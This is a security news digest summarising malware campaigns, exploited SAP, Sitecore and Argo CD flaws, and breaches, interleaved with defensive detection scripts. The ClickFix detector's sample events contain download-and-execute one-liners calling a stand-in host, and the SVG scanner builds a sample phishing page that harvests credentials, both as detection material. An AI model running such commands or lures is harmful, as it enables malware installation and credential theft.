Daily Brief

Find articles below, see 'DETAILS' for generated summaries

Total articles found: 11763

Checks for new stories every ~15 minutes

2025-09-05 19:50:33 theregister MALWARE CastleRAT Malware Expands with New C and Python Variants
TAG-150, a criminal group, has developed CastleRAT in both Python and C, relying on social engineering to get users to run the malicious commands themselves. The C variant harvests keystrokes, captures screenshots and maintains persistence; the Python variant is stripped down and built for evasion. Distribution relies on ClickFix lures: fake error, CAPTCHA or verification prompts that tell the victim to paste a supposed "fix" into the Run dialog or a terminal, and that pasted command fetches and executes the malware. TAG-150's operations are mature, using Tox Chat for encrypted communications and hosting infrastructure in Russia and the Netherlands. The group runs a malware-as-a-service model with victims concentrated in the United States; because the tooling is shared with customers, attributing any single intrusion to TAG-150 itself is harder. Recorded Future advises monitoring network activity on ports 443, 7777 and 80, and cautions that infrastructure hosted with established cloud providers should not be trusted on reputation alone. TAG-150's record of producing multiple malware families suggests further tooling is likely, so defenders should expect follow-on variants.
Details
2025-09-05 19:38:07 bleepingcomputer VULNERABILITIES Microsoft Mandates Multifactor Authentication for Azure Portal Access
Microsoft has enforced multifactor authentication (MFA) for Azure Portal sign-ins across all tenants since March 2025, completing the first phase of a rollout announced in May 2024 and begun in October 2024. The second phase extends enforcement to Azure CLI, Azure PowerShell, SDKs, APIs and infrastructure-as-code tools starting October 2025, closing the gap for scripted and automated administration. Microsoft had earlier warned Entra global admins to enable MFA by October 2024 to avoid losing access to the admin portals. A Microsoft study found that MFA cuts the risk of account compromise by 99.22% overall and by 98.56% even where the credentials had already leaked. GitHub, also owned by Microsoft, finished requiring two-factor authentication for code contributors in January 2024. Together these steps reflect Microsoft's goal of 100% MFA coverage, which removes password-only sign-in as the easiest route to account takeover.
Details
2025-09-05 18:12:52 theregister VULNERABILITIES Critical SAP S/4HANA Vulnerability Actively Exploited, Urgent Patching Advised
A critical code-injection flaw in SAP S/4HANA, CVE-2025-42957 (CVSS 9.9), is under active exploitation. It affects both the Private Cloud and on-premises editions and lets an attacker holding a low-privileged user account take over the SAP system. SecurityBridge Threat Research Labs found the flaw and has confirmed exploitation, showing that an attacker can create unauthorized superuser accounts and manipulate business data. The attack is low in complexity: arbitrary ABAP code is injected through an RFC-exposed function module, bypassing the normal authorization checks and compromising system integrity and data confidentiality. SAP shipped a fix in its August 2025 Patch Day; organizations should apply it immediately. Customers are also advised to enable SAP UCON to restrict which function modules are callable over RFC, and to monitor for unexpected admin-level user creation and ABAP code changes. Successful exploitation can mean full system compromise, data theft and operational disruption, so defensive measures should not wait.
Details
2025-09-05 16:18:45 thehackernews VULNERABILITIES CISA Urges Immediate Patch for Critical Sitecore Vulnerability
CISA has added CVE-2025-53690 to its Known Exploited Vulnerabilities catalog and requires Federal Civilian Executive Branch agencies to remediate their Sitecore instances by September 25, 2025. The flaw (CVSS 9.0) is a ViewState deserialization issue rooted in configuration: affected Sitecore deployments used a sample ASP.NET machine key published in older deployment guides, so anyone who knows that key can produce a validly signed ViewState payload and execute code on the server. Mandiant identified the attack, which used exactly that sample key to gain access and then escalate privileges. The intruders deployed the WEEPSTEEL payload to gather and exfiltrate system, network and user information, created local admin accounts for persistence, and used further tooling for reconnaissance and lateral movement, with data theft the likely goal. Organizations are advised to rotate their ASP.NET machine keys, harden configuration and scan for indicators of compromise. Sitecore now generates unique keys automatically for new deployments and is contacting affected customers; the full extent of exploitation is still unknown.
Details
2025-09-05 15:38:28 bleepingcomputer DATA BREACH Wealthsimple Data Breach Linked to Salesloft Supply-Chain Attack
Wealthsimple, a major Canadian financial services firm, reported a data breach affecting personal data of under 1% of its clients, with no financial losses or password compromises. The breach was traced to a compromised third-party software package, impacting contact details, government IDs, financial information, and other personal data. Wealthsimple has offered affected clients two years of complimentary credit monitoring, dark-web monitoring, identity theft protection, and insurance to mitigate potential risks. The breach is believed to be part of a larger Salesloft supply-chain attack by the ShinyHunters group, which has targeted Salesforce customers using voice phishing and OAuth token theft. ShinyHunters has previously breached high-profile companies, including Google and Cisco, by compromising Salesforce instances and accessing sensitive information. Wealthsimple has advised clients to enhance account security with two-factor authentication and remain vigilant against phishing scams. This incident underscores the importance of securing third-party software and supply chains to protect sensitive customer data.
Details
2025-09-05 15:30:43 bleepingcomputer VULNERABILITIES Critical Argo CD Flaw Exposes Repository Credentials, Urgent Patch Advised
A critical vulnerability in Argo CD, CVE-2025-55190, lets API tokens with only low-level project permissions read repository credentials through the project details API. Rated 10.0 (CVSS v3), the flaw bypasses the project scoping that is supposed to keep repository secrets out of reach of ordinary tokens, so a token holder could clone private codebases or inject malicious content. Argo CD is used for large-scale deployments by organizations including Adobe, Google and IBM, which widens the potential impact. Exploitation requires a valid Argo CD API token but no elevated permissions, so any leaked or over-shared token becomes a route to the credentials. All supported release lines were affected; fixes ship in 3.1.2, 3.0.14, 2.14.16 and 2.13.9, and administrators should upgrade to the fixed release for their line and rotate any repository credentials that could have been read. The exposure can lead to code theft, extortion and downstream supply chain attacks, so prompt remediation is essential.
Details
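A first question after the Argo CD item above is which clusters are actually on a fixed build. The script below is an added example (not Argo CD project code) that parses the version strings `argocd version` reports and compares them with the fixed releases named in the summary; the version inventory it runs over is constructed, and the assumption that lines newer than 3.1 carry the fix is marked in the code.

```python
"""Decide whether an Argo CD build is on a release that fixes CVE-2025-55190.

Added example, not Argo CD project code. The first fixed release on each line comes
from the article; the version strings exercised below are constructed.
"""
import re
from typing import Optional, Tuple

# First release carrying the fix on each affected line (per the article).
FIXED_RELEASES = {
    (2, 13): (2, 13, 9),
    (2, 14): (2, 14, 16),
    (3, 0): (3, 0, 14),
    (3, 1): (3, 1, 2),
}

# Accepts v3.1.1, 3.1.2-rc1, 2.14.16+g1a2b3c (the shapes `argocd version` prints).
_VERSION_RE = re.compile(
    r"^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.]+)?(\+[0-9A-Za-z.]+)?$"
)


def parse_version(text: str) -> Optional[Tuple[int, int, int, bool]]:
    """Return (major, minor, patch, is_prerelease) or None if unparseable."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, pre, _build = m.groups()
    return int(major), int(minor), int(patch), pre is not None


def is_patched(version: str) -> Optional[bool]:
    """True if the build includes the fix, False if it is vulnerable,
    None if the string cannot be parsed or the line is not covered here."""
    parsed = parse_version(version)
    if parsed is None:
        return None
    major, minor, patch, is_prerelease = parsed
    fixed = FIXED_RELEASES.get((major, minor))
    if fixed is None:
        # Assumption: a line branched after 3.1 inherits the fix. Lines older than
        # 2.13 have no fix in the article's list, so report them as unknown and
        # check the upstream advisory rather than guessing.
        return True if (major, minor) > (3, 1) else None
    if (major, minor, patch) > fixed:
        return True
    if (major, minor, patch) < fixed:
        return False
    # Same number as the fixed release: an rc/pre-release build predates it.
    return not is_prerelease


def triage(versions):
    """Map each reported version to 'patched', 'vulnerable' or 'unknown'."""
    labels = {True: "patched", False: "vulnerable", None: "unknown"}
    return {v: labels[is_patched(v)] for v in versions}


if __name__ == "__main__":
    # Constructed inventory, as if collected with `argocd version` per cluster.
    report = triage(["v3.1.1", "v3.1.2", "2.14.15", "2.14.16+g1a2b3c",
                     "3.1.2-rc1", "v2.12.10", "not-a-version"])
    for v, status in report.items():
        print(f"{v:>18}: {status}")
```

Anything reported as vulnerable or unknown should be treated as if its repository credentials were readable by every token holder until it is upgraded and the credentials are rotated.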
2025-09-05 14:27:03 bleepingcomputer MISCELLANEOUS Transitioning to No-Code IGA Solutions for Enhanced Security
Organizations face increasing identity-based attacks, necessitating efficient Identity Governance & Administration (IGA) to secure data and maintain compliance in complex IT environments. Traditional IGA solutions, while customizable, often require extensive setup with custom code, leading to delays and increased costs for businesses. Legacy IGA systems can take years to implement, creating technical debt and failing to deliver timely security enhancements. No-code IGA solutions like tenfold offer out-of-the-box integration, reducing setup time from months or years to mere weeks. These modern solutions provide pre-developed plugins and a visual interface, simplifying deployment and minimizing IT workload. The shift to no-code IGA supports faster security posture improvements and compliance, without sacrificing flexibility for custom requirements. Businesses are encouraged to evaluate IGA solutions based on integration timelines, essential features, and organizational needs for optimal security and operational efficiency.
Details
2025-09-05 14:10:58 thehackernews MALWARE TAG-150 Expands Operations with CastleRAT and CastleLoader Malware
TAG-150 has built CastleRAT, a remote access trojan, in both Python and C, extending the malware-as-a-service framework it has run around CastleLoader since March 2025. CastleRAT's core functions are system information collection, payload execution, a remote shell and self-deletion; the C variant adds keystroke logging and clipboard hijacking that swaps in attacker-controlled cryptocurrency wallet addresses. Infections start mainly with Cloudflare-themed phishing pages and fraudulent GitHub repositories, served from domains that imitate software libraries and popular online platforms. TAG-150's multi-tiered infrastructure separates victim-facing command-and-control servers from backend and backup servers, and CastleRAT uses Steam Community profiles as a dead-drop resolver to find its current C2 address. Recent builds of the C variant show active development, with changes to what data is collected and new features added. eSentire tracks the same malware as NightshadeC2 and reports UAC prompt bombing (re-raising the elevation prompt until the user gives in) to bypass security controls, with delivery via a .NET loader. The case illustrates the staying power of commodity malware frameworks and the value of phishing defences and endpoint monitoring.
Details
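Both CastleRAT entries above describe the same initial access: the victim pastes a command into the Run dialog or a terminal, and that command fetches the payload. The script below is an added example, not Recorded Future's or eSentire's detection content, showing how that pattern looks in process-creation telemetry and how to flag it. The event records are constructed and loosely follow Sysmon Event ID 1 field names; the lure-text indicator reflects commonly reported ClickFix one-liners, not anything quoted from the article.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example, not from the article or the vendors it cites. The event records
are constructed and loosely follow Sysmon Event ID 1 field names.
"""
import re
from pathlib import PureWindowsPath

# Where a pasted command lands: Win+R (explorer.exe) or a terminal window.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}

# Interpreters and download helpers a pasted one-liner typically invokes.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "msiexec.exe", "curl.exe", "bitsadmin.exe", "certutil.exe",
}

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|"
        r"curl|wget|bitsadmin|certutil)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
    # Reassuring text appended so the Run box shows a 'verification' string.
    "captcha_lure": re.compile(r"not a robot|verification id|verify you are human", re.I),
    "policy_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def score_event(event: dict) -> list:
    """Return the names of indicators present in the event's command line."""
    cmdline = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_clickfix_like(event: dict) -> bool:
    """Flag when an interactive parent launched an interpreter with any indicator,
    or when two or more indicators stack up regardless of parent."""
    hits = score_event(event)
    interactive = (_basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS
                   and _basename(event.get("Image", "")) in INTERPRETERS)
    return (interactive and len(hits) >= 1) or len(hits) >= 2


def triage(events):
    """Return [{'index', 'image', 'indicators'}] for every flagged event."""
    return [
        {"index": i, "image": _basename(e.get("Image", "")), "indicators": score_event(e)}
        for i, e in enumerate(events) if is_clickfix_like(e)
    ]


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {   # victim pasted the lure's one-liner into Win+R
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify).Content" '
                       '# I am not a robot - reCAPTCHA Verification ID: 7391',
    },
    {   # mshta pulling a remote HTA, another common shape of the same lure
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/captcha.hta",
    },
    {   # scheduled maintenance script: a bypass flag alone is not enough
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # benign interactive use
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c dir C:\Users",
    },
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The parent-process condition is what keeps this rule quiet: administrators run PowerShell with unusual flags all day, but a download cradle spawned directly from explorer.exe is rare outside of a user following pasted instructions.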
2025-09-05 13:41:32 bleepingcomputer VULNERABILITIES Critical SAP S/4HANA Vulnerability Exploited Amid Patch Delays
A critical vulnerability, CVE-2025-42957, in SAP S/4HANA is under active exploitation, allowing attackers to inject arbitrary code and take over systems. The flaw resides in an RFC-exposed function module, so the attack surface is any user able to make RFC calls, and the consequences range from data theft to operational disruption. Although SAP released a fix on its August 11, 2025 Patch Day, many systems remain unpatched and exposed. SecurityBridge discovered and reported the vulnerability and assisted SAP with the fix, but continues to see exploitation against systems that have not applied it. The flaw lets low-privileged users bypass authorization checks and escalate privileges, for example by creating backdoor accounts. SecurityBridge warns of follow-on impacts including credential theft and malware deployment and urges immediate patching. SAP administrators should apply the August 2025 Patch Day updates without delay.
Details
2025-09-05 11:01:51 thehackernews VULNERABILITIES Critical SAP S/4HANA Vulnerability Exploited; Urgent Patch Recommended
SAP S/4HANA's critical code injection vulnerability, CVE-2025-42957, is being actively exploited, posing severe risks to enterprise systems. The flaw allows arbitrary ABAP code execution, threatening system integrity. Rated CVSS 9.9, it was addressed in SAP's August monthly updates, but exploitation continues against both on-premises and Private Cloud editions. Attackers need only low-privileged user access, and a successful attack can lead to full system compromise, fraud, data theft, espionage or ransomware deployment. SecurityBridge Threat Research Labs has observed active exploitation, though widespread attacks have not yet been reported. Reverse engineering the patch to build an exploit is relatively straightforward, so the window before broader abuse is short. Organizations are urged to apply the patch immediately, monitor for suspicious RFC calls and review admin user activity. Additional measures include implementing SAP UCON to restrict RFC usage and reviewing who holds critical authorization objects. The incident highlights the importance of timely patch management and proactive monitoring for critical enterprise systems.
Details
2025-09-05 08:32:07 theregister DATA BREACH Intradev Cyberattack Compromises UK School Trust Staff Data
Affinity Learning Partnership, managing seven UK schools, reported a data breach affecting over 650 staff members following a cyberattack on software developer Intradev. The breach potentially exposed sensitive personal information, including names, addresses, and identification numbers, through compromised services provided by OnlineSCR. Intradev, based in Hull, identified the breach on August 4 and is conducting a thorough investigation to assess the impact on its systems and data. Affected staff have been advised on precautionary measures, with some considering document replacements, although the ICO suggests this may not be necessary. The incident underscores the vulnerability of educational institutions to cyber threats, particularly through third-party service providers handling critical data. Affinity Learning Partnership is offering affected staff CIFAS protective registration for two years, enhancing identity verification to mitigate potential fraud risks. This breach highlights the importance of robust cybersecurity practices and third-party risk management for organizations handling sensitive data.
Details
2025-09-05 08:01:46 thehackernews VULNERABILITIES Automation Revolutionizes Pentest Delivery for Faster Security Insights
Traditional pentest reporting methods, such as static PDFs and spreadsheets, are creating inefficiencies and delays in remediation processes. Automated platforms like PlexTrac enable real-time delivery of pentest findings, integrating seamlessly into existing client workflows. Automation in pentest delivery enhances visibility across the vulnerability lifecycle, reducing mean time to remediation significantly. Continuous Threat Exposure Management (CTEM) and increased testing frequency demand efficient handling of growing volumes of findings. Service providers gain a competitive edge by adopting automated delivery, offering clients faster, more actionable insights. Enterprises benefit from operational maturity and reduced risk by transitioning to automated, standardized pentest workflows. The shift towards automated delivery supports proactive security measures, helping teams collaborate more effectively and stay ahead of threats.
Details
2025-09-05 06:16:39 thehackernews MALWARE SVG Files and Atomic macOS Stealer Exploit New Attack Vectors
Cybersecurity researchers identified a phishing campaign using SVG files that carry embedded JavaScript: opened in a browser, the script decodes a Base64-encoded HTML phishing page impersonating the Colombian judicial system, and at the time of the report no antivirus engine on VirusTotal flagged the files, thanks to obfuscation and the unusual carrier format. VirusTotal counted 44 unique SVG files in this campaign and 523 related SVGs in the wild, indicating a sustained and evolving operation. The SVGs present a fake official document download while triggering a ZIP download in the background; the contents of that archive were not disclosed. Separately, a campaign targeting macOS users delivers Atomic macOS Stealer (AMOS) through cracked-software sites that instruct the victim to paste a command into Terminal, which fetches and runs the stealer. AMOS steals credentials, browser data and cryptocurrency wallets, a growing concern as macOS spreads through enterprise fleets. Gatekeeper now blocks most traditional .dmg-based infections, so attackers have shifted to having the user run the installer from the terminal, which sidesteps the checks Gatekeeper applies to downloaded applications. Terminal-driven installs of this kind show why macOS defences cannot rest on the operating system's defaults alone; both campaigns are examples of attackers adapting to improved baseline protections, and argue for proactive threat intelligence and layered controls.
Details
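The SVG campaign above works because an SVG is XML that browsers will also execute script from. The scanner below is an added example, not VirusTotal's or the researchers' tooling: it parses an SVG, reports script elements, inline event handlers and foreignObject blocks, and decodes any long Base64 run to see whether it hides HTML or JavaScript. Both sample SVGs are constructed for the example, including the Spanish-language login form used as the embedded payload.

```python
"""Triage an SVG for embedded phishing content.

Added example, not from VirusTotal or the article. Parses the SVG as XML and
reports script elements, inline event handlers, foreignObject blocks and any
Base64 blob that decodes to HTML or JavaScript. Both sample SVGs are constructed.
"""
import base64
import re
import xml.etree.ElementTree as ET

_B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
_HTML_MARKERS = (b"<html", b"<form", b"<input", b"password", b"<script", b"document.write")


def _decoded_html_payloads(text: str):
    """Yield (blob, decoded) for Base64 runs in `text` that decode to HTML-like content."""
    for blob in _B64_RE.findall(text or ""):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:          # binascii.Error is a ValueError: bad padding/alphabet
            continue
        if any(marker in decoded.lower() for marker in _HTML_MARKERS):
            yield blob, decoded


def scan_svg(svg_bytes: bytes) -> list:
    """Return findings as {'kind', 'where', 'detail'} dicts; [] means nothing suspicious."""
    root = ET.fromstring(svg_bytes)
    findings = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()      # strip the SVG namespace
        if tag == "script":
            findings.append({"kind": "script_element", "where": tag,
                             "detail": (el.text or "")[:60]})
        if tag == "foreignobject":
            findings.append({"kind": "foreign_object", "where": tag, "detail": ""})
        for attr, value in el.attrib.items():
            if attr.rsplit("}", 1)[-1].lower().startswith("on"):   # onload, onclick, ...
                findings.append({"kind": "event_handler", "where": f"{tag}@{attr}",
                                 "detail": value[:60]})
        # Base64 may sit in script text or in attributes such as href data: URIs.
        for text in [el.text or ""] + list(el.attrib.values()):
            for _blob, decoded in _decoded_html_payloads(text):
                findings.append({"kind": "base64_html_payload", "where": tag,
                                 "detail": decoded[:80].decode("utf-8", "replace")})
    return findings


# Constructed lure: paints a 'download' prompt, then writes a login form over the
# page once the SVG is opened in a browser.
_PHISH_HTML = (b'<html><body><form action="https://example.invalid/login" method="post">'
               b'Usuario <input name="u"> Clave <input type="password" name="p">'
               b'<input type="submit" value="Ingresar"></form></body></html>')
SAMPLE_PHISHING_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400">'
    b'<text x="20" y="40">Descargar documento</text>'
    b'<script type="text/javascript">var p=atob("' + base64.b64encode(_PHISH_HTML) + b'");'
    b'document.open();document.write(p);document.close();</script></svg>')

# Constructed benign file for comparison.
SAMPLE_BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
    b'<circle cx="50" cy="50" r="40" fill="steelblue"/></svg>')

if __name__ == "__main__":
    for name, svg in (("phishing", SAMPLE_PHISHING_SVG), ("benign", SAMPLE_BENIGN_SVG)):
        print(name, scan_svg(svg) or "clean")
```

For mail-gateway use the simplest policy is the strictest: an SVG attachment that contains any script element or event handler has no business reaching a user, whatever the decoded payload looks like.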
2025-09-04 23:19:34 theregister VULNERABILITIES Sitecore Vulnerability Exploited for Remote Code Execution and Malware Deployment
Attackers are exploiting CVE-2025-53690, a ViewState deserialization vulnerability in Sitecore products that stems from a configuration flaw: deployments that kept the static ASP.NET machine key published in older Sitecore documentation. The vulnerability affects Sitecore Experience Manager, Experience Platform, Experience Commerce and Managed Cloud wherever that sample key is still in use, and a successful attack yields remote code execution. Mandiant observed the intrusion deploying WEEPSTEEL, malware that collects system, network and user information from the compromised host. Mandiant disrupted the attack before the full lifecycle could be observed, but noted that the attackers understood both the vulnerability and the product in depth. The US Cybersecurity and Infrastructure Security Agency has added CVE-2025-53690 to its Known Exploited Vulnerabilities catalog, urging immediate key rotation and patching. Sitecore's updated deployments now generate random machine keys; organizations on older installs should update and replace the key promptly. The incident is a reminder to review security-relevant configuration regularly and never to carry default or sample keys into production.
Details
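Both Sitecore entries above come down to one web.config element: a `<machineKey>` whose value an attacker already knows lets them sign their own ViewState. The script below is an added example (not Sitecore's or Microsoft's tooling) that audits the element for known sample values, short or non-hex keys and legacy algorithms, and rewrites it with fresh random keys. `KNOWN_SAMPLE_KEYS` is a placeholder by assumption, since the real documented sample values are not reproduced here; the web.config fragment is constructed.

```python
"""Audit and rotate the ASP.NET <machineKey> in a web.config.

Added example, not Sitecore's or Microsoft's tooling. KNOWN_SAMPLE_KEYS is a
placeholder (assumption): load the sample keys from your vendor's advisory there.
The web.config fragment below is constructed.
"""
import re
import secrets
import xml.etree.ElementTree as ET

KNOWN_SAMPLE_KEYS = {
    # placeholder standing in for documented sample keys (assumption)
    "0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF",
}
WEAK_VALIDATION = {"MD5", "SHA1", "3DES"}
STRONG_DECRYPTION = {"AES", "AUTO"}                     # Auto resolves to AES on .NET 4.x
MIN_HEX = {"validationKey": 64, "decryptionKey": 32}    # 256-bit HMAC key, AES-128 floor
_HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")


def _machine_key_element(root):
    return next(root.iter("machineKey"), None)


def read_machine_key(config_xml: str) -> dict:
    """Return the <machineKey> attributes, or {} when the element is absent."""
    el = _machine_key_element(ET.fromstring(config_xml))
    return dict(el.attrib) if el is not None else {}


def audit(config_xml: str) -> list:
    """Return findings as (kind, attribute) tuples; an empty list means nothing to fix."""
    attrs = read_machine_key(config_xml)
    if not attrs:
        # Absent means per-process auto-generation: fine on one server, but a web
        # farm needs one explicit key shared by every node.
        return [("machineKey_not_set", "")]
    findings = []
    for name in ("validationKey", "decryptionKey"):
        value = attrs.get(name, "AutoGenerate")
        if value.startswith("AutoGenerate"):
            continue
        if value.upper() in {k.upper() for k in KNOWN_SAMPLE_KEYS}:
            findings.append(("known_sample_key", name))
        if not _HEX_RE.match(value) or len(value) < MIN_HEX[name]:
            findings.append(("short_or_nonhex_key", name))
    if attrs.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
        findings.append(("weak_validation_algorithm", "validation"))
    if attrs.get("decryption", "Auto").upper() not in STRONG_DECRYPTION:
        findings.append(("weak_decryption_algorithm", "decryption"))
    return findings


def rotate_machine_key(config_xml: str) -> str:
    """Return the config with fresh random keys and current algorithms.

    Apply the same values to every node of a farm. Rotation invalidates outstanding
    ViewState and forms-authentication tickets, which is exactly what is wanted
    after a key has leaked.
    """
    root = ET.fromstring(config_xml)
    el = _machine_key_element(root)
    if el is None:
        system_web = next(root.iter("system.web"), None)
        if system_web is None:
            raise ValueError("no <system.web> section in config")
        el = ET.SubElement(system_web, "machineKey")
    el.set("validationKey", secrets.token_hex(64).upper())   # 512-bit key, 128 hex chars
    el.set("decryptionKey", secrets.token_hex(32).upper())   # AES-256, 64 hex chars
    el.set("validation", "HMACSHA256")
    el.set("decryption", "AES")
    return ET.tostring(root, encoding="unicode")


# Constructed web.config fragment: placeholder sample key plus legacy algorithms.
SAMPLE_WEAK_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_WEAK_CONFIG):
        print("finding:", *finding)
    fixed = rotate_machine_key(SAMPLE_WEAK_CONFIG)
    print("after rotation:", audit(fixed) or "clean")
```

Rotating the key closes the forged-ViewState route but does nothing about accounts or tooling an intruder already planted, so the key change belongs alongside the indicator sweep the summaries call for, not instead of it.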
2025-09-04 22:24:57 theregister VULNERABILITIES AI System A2 Uncovers Over 100 Zero-Day Flaws in Android Apps
Researchers from Nanjing University and The University of Sydney developed A2, an AI system that identifies and validates vulnerabilities in Android applications, discovering 104 zero-day flaws in 169 apps. A2 achieved 78.3% coverage on the Ghera benchmark, outperforming traditional static analysis tools like APKHunt, which only reached 30% coverage. The AI system's validation capability reduces false positives, offering a more efficient approach to vulnerability detection, crucial for security teams burdened by low-signal warnings. A2 employs a three-step validation process to confirm vulnerabilities, such as an intent redirect flaw in a widely installed Android app, demonstrating its ability to find impactful issues. The system's cost-effectiveness is notable, with detection costs ranging from $0.003 to $3.35 per APK, and full validation costs between $0.59 and $26.85 per vulnerability. A2's success signals a shift in cybersecurity, with AI-driven tools potentially transforming how vulnerabilities are discovered and addressed, prompting increased activity in both defense and exploitation. While promising for bug bounty hunters, A2's capabilities also highlight the need for rapid defensive measures to prevent exploitation of uncovered vulnerabilities.
Details